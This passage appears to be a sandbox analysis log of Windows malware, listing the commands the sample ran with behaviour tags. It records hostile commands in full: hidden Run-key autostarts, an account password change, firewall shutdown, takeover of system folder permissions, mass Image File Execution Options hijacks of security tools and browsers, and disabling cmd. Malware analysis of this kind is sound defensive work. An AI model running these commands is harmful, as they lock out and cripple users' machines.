C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\main.cpl",4⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\azman.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\calc.execalc3⤵
-
-
C:\Windows\system32\calc.execalc3⤵
-
-
C:\Windows\system32\ComputerDefaults.execomputerdefaults3⤵
-
-
C:\Windows\system32\attrib.exeattrib +s +h c:\123.vbs3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +s +h c:\1234.vbs3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +s +h c:\gay.bat3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 123.vbs /d c:\123.vbs3⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v mbr.exe /d "C:\Windows\N3OS3X3R\mbr.exe"3⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 1234.vbs /d c:\1234.vbs3⤵
- Adds Run key to start application
-
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v gay.bat /d c:\gay.bat3⤵
- Adds Run key to start application
-
-
C:\Windows\system32\attrib.exeattrib +s +h c:\123.vbs3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +s +h c:\1234.vbs3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\system32\attrib.exeattrib +s +h c:\gay.bat3⤵
- Sets file to hidden
- Views/modifies file attributes
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\123.vbs"3⤵
- Enumerates connected drives
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\1234.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bozo8.vbs"3⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://pbs.twimg.com/media/FkSeD3kXkAEVNrI?format=jpg' -OutFile 'C:\Users\Admin\AppData\Local\Temp\wallpaper.jpg'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path 'HKCU:\Control Panel\Desktop\' -Name Wallpaper -Value 'C:\Users\Admin\AppData\Local\Temp\wallpaper.jpg'; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Wallpaper { [DllImport(\"user32.dll\")] public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni); }'; [Wallpaper]::SystemParametersInfo(20, 0, 'C:\Users\Admin\AppData\Local\Temp\wallpaper.jpg', 3)"3⤵
- Command and Scripting Interpreter: PowerShell
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\shvqpc_w.cmdline"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C14.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7C13.tmp"5⤵
-
-
-
-
C:\Windows\system32\control.execontrol userpasswords23⤵
-
C:\Windows\system32\netplwiz.exe"C:\Windows\system32\netplwiz.exe"4⤵
-
-
-
C:\Windows\system32\control.execontrol userpasswords3⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\system32\cscript.execscript email_spam.vbs3⤵
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\desk.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\desk.cpl",4⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Windows\system32\notepad.exenotepad3⤵
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\comexp.msc"3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\credwiz.execredwiz.exe3⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\system32\notepad.exenotepad3⤵
-
-
C:\Windows\system32\DisplaySwitch.exedisplayswitch3⤵
-
-
C:\Windows\system32\calc.execalc3⤵
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\main.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\main.cpl",4⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\sysdm.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\sysdm.cpl",4⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Windows\system32\OptionalFeatures.exeoptionalfeatures3⤵
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\mmsys.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\mmsys.cpl",4⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Windows\system32\control.execontrol3⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\timedate.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\timedate.cpl",4⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\desk.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\desk.cpl",4⤵
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\joy.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\joy.cpl",4⤵
-
-
-
C:\Windows\system32\control.execontrol system3⤵
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\azman.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\WF.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\ncpa.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\ncpa.cpl",4⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Windows\system32\dccw.exedccw.exe3⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\system32\dfrgui.exedfrgui.exe3⤵
-
-
C:\Windows\system32\iscsicpl.exeiscsicpl3⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\system32\colorcpl.execolorcpl.exe3⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\system32\dialer.exedialer.exe3⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\system32\eventvwr.exeeventvwr.exe3⤵
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"4⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\system32\notepad.exenotepad3⤵
-
-
C:\Windows\system32\DisplaySwitch.exedisplayswitch3⤵
-
-
C:\Windows\system32\calc.execalc3⤵
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\main.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\main.cpl",4⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\sysdm.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\sysdm.cpl",4⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Windows\system32\OptionalFeatures.exeoptionalfeatures3⤵
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\mmsys.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\mmsys.cpl",4⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Windows\system32\control.execontrol3⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\timedate.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\timedate.cpl",4⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\desk.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\desk.cpl",4⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\joy.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\joy.cpl",4⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Windows\system32\control.execontrol system3⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\azman.msc"3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\WF.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\ncpa.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\ncpa.cpl",4⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
C:\Windows\system32\net.exenet user "Admin" "YOU HAVE BEEN FUCKED"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user "Admin" "YOU HAVE BEEN FUCKED"4⤵
-
-
-
C:\Windows\system32\net.exenet user Admin ih82011jaxs3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user Admin ih82011jaxs4⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://sfdl.360safe.com/instbeta.exe' -OutFile 'C:\Windows\N3OS3X3R\chinah.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K fucking.bat3⤵
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\fsmgmt.msc"3⤵
- Suspicious behavior: SetClipboardViewer
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\nslookup.exenslookup myip.opendns.com resolver1.opendns.com3⤵
- Unexpected DNS network traffic destination
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
-
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
-
-
C:\Windows\system32\find.exefind /i "IPv4"3⤵
-
-
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get size3⤵
-
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name3⤵
-
-
C:\Windows\system32\systeminfo.exesysteminfo3⤵
- Gathers system information
-
-
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Windows\system32\joy.cpl",3⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Windows\system32\joy.cpl",4⤵
-
-
-
C:\Windows\system32\iexpress.exeiexpress.exe3⤵
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\system32\timeout.exetimeout 2 /NOBREAK3⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32 /Grant Users:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\ /Grant Users:F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\charmap.execharmap.exe3⤵
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\system32\cleanmgr.execleanmgr.exe3⤵
- Enumerates connected drives
- Suspicious behavior: GetForegroundWindowSpam
-
-
C:\Windows\system32\certreq.execertreq.exe3⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\mmc.exe"C:\Windows\system32\mmc.exe" "C:\Windows\system32\certmgr.msc"3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: SetClipboardViewer
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\speech.vbs"3⤵
-
-
C:\Windows\system32\takeown.exetakeown /F "C:\Windows\Web" /A /R /D Y3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\Windows\Web" /setowner "Administrators" /T /C3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\reg.exereg add "HKCR\inffile\shell\Install\command" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKCR\regfile\shell\open\command" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKCR\VBSFile\Shell\Edit\Command" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msert.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mssecse.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner32.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCleaner64.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbsedit.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\htaedit.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VirtualBox.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uTorrent.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uninstall.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad++.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adwcleaner_5.005.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\student.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmc.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit32.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit33.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\chrome.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firefox.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\installer.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\update.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\updater.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\plugin-hang-ui.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\control.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mdsched.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhost.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\crashreporter.exe\Debugger" /ve /d "C:\Windows\System32\sex.exe" /f3⤵
- Event Triggered Execution: Image File Execution Options Injection
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD" /d "1" /t REG_DWORD /f3⤵
- Disables cmd.exe use via registry modification
-
-
